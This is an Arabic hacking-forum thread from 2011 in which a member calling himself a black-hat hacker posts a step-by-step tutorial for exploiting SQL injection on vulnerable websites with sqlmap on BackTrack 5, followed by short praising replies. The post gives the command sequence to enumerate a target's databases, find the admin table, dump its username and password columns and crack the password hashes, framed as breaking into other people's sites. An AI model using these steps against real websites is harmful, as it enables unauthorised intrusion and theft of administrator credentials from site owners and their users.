نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ مـنتدى حمايه المواقع والسيرفرات | Hacking Site's & Servers ] حمايه وأختراق المواقع والسيرفرات باحدت الطرق والادوات ..

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 11/07/2011, 07:48   المشاركة رقم: 1
المعلومات
الكاتب:
 HACKER==MAN  
اللقب:
عضــــو جديــــد
الصورة الرمزية
 
الصورة الرمزية HACKER==MAN

البيانات
التسجيل : Aug 2010
العضوية : 462
الاهتمامات : الهكر
الإقامة : مصر
المواضيع : 107
الردود : 763
المجموع : 870
بمعدل : 0.15 يوميا
الاختراقات : []
مجتمعنا : []
الصنف : Black Hat Hacker
آخر تواجد : 07/07/2012/20:20
سبب الغياب : الامتحانات وعذابها
معدل التقييم: 16
نقاط التقييم: 12
HACKER==MAN is on a distinguished road
شكراً: 14
تم شكره 25 مرة في 19 مشاركة

 Egypt


الإتصالات
الحالة:
HACKER==MAN غير متواجد حالياً
وسائل الإتصال:

Talking أستغلال SQL عبر نظام BackTrack 5


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته

::===================::

طبعا الموضوع باين من عنوانه هو أحتراف أستغلال ثغرات SQL عبر نظام backtrack 5

::===================::

نبدء على بركة الله

أولا نشغل الباك تراك

ونختار من القائمة كما هي موضحه بالصورة



الأن بتظهر لك هذي الواجهه الرسومية



الأن كذا تمام هذه الأداه تغنيك عن اي برنامج او اي برمجة وهي فيها كل الأدوات الي تحتاجها
تقدر تكتب help ثم انتر عشان يعطيك جميع الأوامر لهذي الأداه الجبارة
الأن تكتب

python sqlmap.py -u xxx --dbs


xxx = الموقع المصاب بـ sql




الأن إظغط انتر وانتظر ثواني وبتظهر لك النتيجة مثل كذا



مثل ما شفت تلقائيا عرف اصدار القاعده وأظهر لنا القواعد تبع الموقع
الأن أكيد انت من النظرة الأولى بتعرف القاعده المطلوبة من أسمها
الأن بنعطيه أمر أظهار الجداول في القاعده الي بنختارها

python sqlmap.py -u xxx -D ddd --tables


xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها




الأن أظغط انتر وشوف النتيجة في الصورة الي تحت



مثل ما شفت طلع لنا الجداول الي داخل القاعده ومن ظمن الجداول جدول الـ الأدمن

الأن هدفنا عرض الأعمدة الي داخل الجدول عن طريق الأمر

python sqlmap.py -u xxx -D ddd -T ttt --columns



xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله مثل ( admin )


مثل الصورة الي تحت



الأن اظغط انت وشوف النتيجه



حلو ظهر لنا عمود اليوزر + عمود الباسورد

الأن يا طويل العمر نبغى نعرف الجدول الي داخل


انا ظهر لي عمود اسمه username شوف الأمر حتى نعرض محتواه

python sqlmap.py -u xxx -D ddd -T ttt -C ccc --dump



xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله
ccc = العمود الي بنظهر محتواه



مثل ما هو موضح بالصورة الي تحت



الأن أظغط انتر وشوف النتيجه اكيد بتعجبك




الأن أنا طلعت محتوى العمود username بنفس الأمر نطلع الباس

فقط نستبدل username بـ password


python sqlmap.py -u xxx -D ddd -T ttt -C ccc --dump



xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله
ccc = العمود الي بنظهر محتواه




مثل مافي الصورة



أظغط أنتر وشوف النتيجه


ا
اذا طلعت لك كما في الصورة فهذا طبيعي لان الباسورد مشفر
وهنا يقولك هل تريد ان تجرب فك الهاش
اذا كنت تريد فك الهاش اكتب Y
اذا ما تبي تفك الهاش اكتب N

واظغط انتر



الحمد لله طلعنا الباس

وهذي هي فكرة استغلال ثغرات SQL عبر نظام BACKTACK 5 اتمنى انكم استفدتو منها



آخر مواضيع » HACKER==MAN

توقيع : HACKER==MAN

http://www3.0zz0.com/2010/10/05/19/616587969.jpg
ادعولى شباب انا ببدأ امتحاناتى فى شهر 6/2011
ادعولى بالنجاح
القاكم بعد الامتحانات باذن الله

عرض البوم صور HACKER==MAN   رد مع اقتباس
قديم 11/07/2011, 09:49   المشاركة رقم: 2
المعلومات
الكاتب:
 Smail002  
اللقب:
.: مستشار اول :.

الإتصالات
الحالة:
Smail002 غير متواجد حالياً
وسائل الإتصال:

موضوع + شرح في القمة
باركة الله فيك []

عرض البوم صور Smail002   رد مع اقتباس
قديم 11/07/2011, 10:37   المشاركة رقم: 3
المعلومات
الكاتب:
 Black-ID  
اللقب:
Don'T 3ven Try

الإتصالات
الحالة:
Black-ID غير متواجد حالياً
وسائل الإتصال:

بارك الله فيك حبيبي على الشرح الراقي

عرض البوم صور Black-ID   رد مع اقتباس
قديم 11/07/2011, 12:02   المشاركة رقم: 4
المعلومات
الكاتب:
 HACKER==MAN  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
HACKER==MAN غير متواجد حالياً
وسائل الإتصال:

منورين شباب وتحياتى الكم نورتوا موضوعى

عرض البوم صور HACKER==MAN   رد مع اقتباس
قديم 11/07/2011, 14:39   المشاركة رقم: 5
المعلومات
الكاتب:
 ANDERSON  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
ANDERSON غير متواجد حالياً
وسائل الإتصال:

سلمت يداك اخي هكر

عرض البوم صور ANDERSON   رد مع اقتباس
قديم 12/07/2011, 11:09   المشاركة رقم: 6
المعلومات
الكاتب:
 HACKER==MAN  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
HACKER==MAN غير متواجد حالياً
وسائل الإتصال:

منور يالغالى

عرض البوم صور HACKER==MAN   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 35
all4dz , ANDERSON , مهاجر زمن , BiRoOo , Black-ID , Devil _ Hacker , DR.X , برمجي و هكرز , ghost-dz , HACER DZ , HACKER==MAN , HaKoReY , hamza 12 , hamza67 , hardTARGET1234 , hmimed , ilYes007_Dz , jago-dz , joker-dz , lesta , mega-king , mo3eth , mouad1989 , MR.KaDeRoU , NeO SpaMs , rafa , ratrk , S4wDz , Smail002 , Th3 K!LL3r Dz , ViRuS_OF_AlGeRiA , ViRuS_Ra3cH , viva plus dz , xxDASxx , §الـقہاتہلٌ الـمہـحـتہرف§

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[دورة] الميتاسبلوت اصبح من الماضي الآن يوجد الـ Backtrack 4 Black-ID توزيعة B4ck|Tr4ck 21 22/01/2013 09:51
backtrack 4 final بتاريخ 11.01.2010 ViRuS_Ra3cH توزيعة B4ck|Tr4ck 6 08/03/2012 15:12
~ وضع الأعلام[Flags] بدل رمووز الللغات للكيبورد في الـ[Linux]|~ مثل الـ [BackTrack] Black-ID نـظـام Linux 2 04/05/2011 08:27
شرح تنصيب BackTrack 3 Final على الهارد و اعدادها بالتفصيل NEVER HaCKEr توزيعة B4ck|Tr4ck 4 25/08/2010 21:44

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 23:18.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115